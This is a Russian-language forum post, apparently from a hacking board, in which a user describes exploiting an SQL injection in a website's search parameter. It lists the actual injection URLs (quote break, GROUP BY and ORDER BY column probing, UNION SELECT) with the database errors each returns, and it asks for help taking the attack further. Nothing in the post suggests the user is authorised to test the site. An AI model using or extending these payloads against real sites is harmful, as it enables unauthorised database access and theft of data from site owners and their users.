"]
[XOR] said:
↑
Нашел на сайте SQL Injection:
http://site.ru/search/?num=13750-01a'
с такой ошибкой:
Database error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
но не могу определить количество столбцов. Через
GROUP BY
определить никак не получается. Делал так:
http://site.ru/search/?num=13750-01a' GROUP BY 2 --
Database error:Unknown column '2' in 'group statement'
если выводится такая ошибка, значит количество столбцов меньше 2, что странно. Естественно далее делаю так:
http://site.ru/search/?num=13750-01a' GROUP BY 1 --
Database error:Can't group on 'cnt'
что за ошибка такая? Гугл не помог.

А вот
ORDER BY
работает немного по другому:
http://site.ru/search/?num=13750-01a' ORDER BY 2 --

Database error:Unknown column '2' in 'order clause'
тут все как и в первом случае. А если сделать так:
http://site.ru/search/?num=13750-01a' ORDER BY 1 --
то никаких ошибок нет и все отображается нормально, в отличии от первого варианта с
GROUP BY
.

И чтобы окончательно убедиться делал так:
http://site.ru/search/?num=13750-01a' UNION SELECT 1 --

Database error:The used SELECT statements have a different number of columns
причем пробовал указывать в
UNION SELECT
несколько столбцов, вплоть до 10, но ошибка не меняется.

В общем, требуется помощь.